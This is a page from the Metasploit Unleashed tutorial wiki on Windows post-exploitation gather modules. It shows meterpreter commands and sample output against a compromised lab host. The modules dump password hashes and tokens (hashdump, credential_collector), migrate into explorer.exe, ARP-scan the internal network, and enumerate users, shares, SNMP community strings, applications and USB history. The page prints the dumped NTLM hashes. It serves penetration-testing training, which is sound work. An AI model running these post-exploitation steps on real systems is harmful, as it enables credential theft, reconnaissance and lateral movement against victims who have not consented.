Windows Post Gather Modules

From Metasploit Unleashed
Jump to: navigation, search


arp_scanner

The "arp_scanner" post module will perform an ARP scan for a given range through a compromised host.

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] 	IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] 	IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] 	IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] 	IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] 	IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] 	IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] 	IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] 	IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] 	IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] 	IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] 	IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] 	IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] 	IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] 	IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] 	IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] 	IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] 	IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] 	IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] 	IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] 	IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] 	IP: 192.168.1.250 MAC 1a:dc:fa:ab:8b:b
meterpreter >


checkvm

The "checkvm" post module, simply enough, checks to see if the compromised host is a virtual machine. This module supports Hyper-V, VMWare, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm 

[*] Checking if V-MAC-XP is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >


credential_collector

The "credential_collector" module harvests passwords hashes and tokens on the compromised host.

meterpreter > run post/windows/gather/credential_collector 

[*] Running module against V-MAC-XP
[+] Collecting hashes...
    Extracted: Administrator:7bf4f254f224bb24aad3b435b51404ee:2892d23cdf84d7a70e2eb2b9f05c425e
    Extracted: Guest:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
    Extracted: HelpAssistant:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714
    Extracted: SUPPORT_388945a0:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287
[+] Collecting tokens...
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    NT AUTHORITY\ANONYMOUS LOGON
meterpreter >


dumplinks

The "dumplinks" module parses the .lnk files in a users Recent Documents which could be useful for further information gathering. Note that, as shown below, we first need to migrate into a user process prior to running the module.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks 

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >


enum_applications

The "enum_applications" module enumerates the applications that are installed on the compromised host.

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on V-MAC-XP

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Adobe Flash Player 10 Plugin                                    10.1.53.64
 Windows Installer 3.1 (KB893803)                                3.1
 Metasploit Framework 3.4.1                                      3.4.1
 Mozilla Firefox (3.6.16)                                        3.6.16 (en-US)
 Notepad++                                                       5.7
 Microsoft SQL Server VSS Writer                                 9.00.1399.06
 Microsoft SQL Server 2005 Express Edition (SQLEXPRESS)          9.00.1399.06
 WinPcap 4.1.1                                                   4.1.0.1753
 Python 2.5                                                      2.5.150
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 WebFldrs XP                                                     9.50.7523
 MSXML 6.0 Parser                                                6.00.3883.8
 ActivePerl 5.12.1 Build 1201                                    5.12.1201
 Kingview 6.53                                                   6.53
 VMware Tools                                                    8.4.5.10855
 Microsoft SQL Server Native Client                              9.00.1399.06
 Microsoft SQL Server Setup Support Files (English)              9.00.1399.06
 Microsoft .NET Framework 2.0                                    2.0.50727


meterpreter >


enum_logged_on_users

The "enum_logged_on_users" post module returns a listing of current and recently logged on users along with their SIDs.

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 3

Current Logged Users
====================

 SID                                          User
 ---                                          ----
 S-1-5-21-839522115-796845957-2147293891-500  V-MAC-XP\Administrator



Recently Logged Users
=====================

 SID                                          Profile Path
 ---                                          ------------
 S-1-5-18                                     %systemroot%\system32\config\systemprofile
 S-1-5-19                                     %SystemDrive%\Documents and Settings\LocalService
 S-1-5-20                                     %SystemDrive%\Documents and Settings\NetworkService
 S-1-5-21-839522115-796845957-2147293891-500  %SystemDrive%\Documents and Settings\Administrator


meterpreter >


enum_shares

The "enum_shares" post module returns a listing of both configured and recently used shares on the compromised system.

meterpreter > run post/windows/gather/enum_shares 

[*] Running against session 3
[*] The following shares were found:
[*] 	Name: Desktop
[*] 	Path: C:\Documents and Settings\Administrator\Desktop
[*] 	Type: 0
[*] 
[*] Recent Mounts found:
[*] 	\\192.168.1.250\software
[*] 	\\192.168.1.250\Data
[*] 
meterpreter >


enum_snmp

The "enum_snmp" module will enumerate the SNMP service configuration on the target, if present, including the community strings.

meterpreter > run post/windows/gather/enum_snmp

[*] Running module against V-MAC-XP
[*] Checking if SNMP is Installed
[*] 	SNMP is installed!
[*] Enumerating community strings
[*] 
[*] 	Comunity Strings
[*] 	================
[*] 	
[*] 	 Name    Type
[*] 	 ----    ----
[*] 	 public  READ ONLY
[*] 
[*] Enumerating Permitted Managers for Community Strings
[*] 	Community Strings can be accessed from any host
[*] Enumerating Trap Configuration
[*] No Traps are configured
meterpreter >


hashdump

The "hashdump" post module will dump the local users accounts on the compromised host using the registry.

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::


meterpreter >


usb_history

The "usb_history" module enumerates the USB drive history on the compromised system.

meterpreter > run post/windows/gather/usb_history 

[*] Running module against V-MAC-XP
[*] 
   C:	                                                             Disk ea4cea4c 
   E:	STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:	FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:	IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime	                    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime	                    Thu Apr 21 13:09:43 -0600 2011
             Manufacturer	                            (Standard disk drives)
           ParentIdPrefix	                                      8&3a01dffe&0 (   E:)
                    Class	                                         DiskDrive
                   Driver	       {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

meterpreter >




Module Reference > Post Modules > Windows Post Modules > Windows Post Gather Modules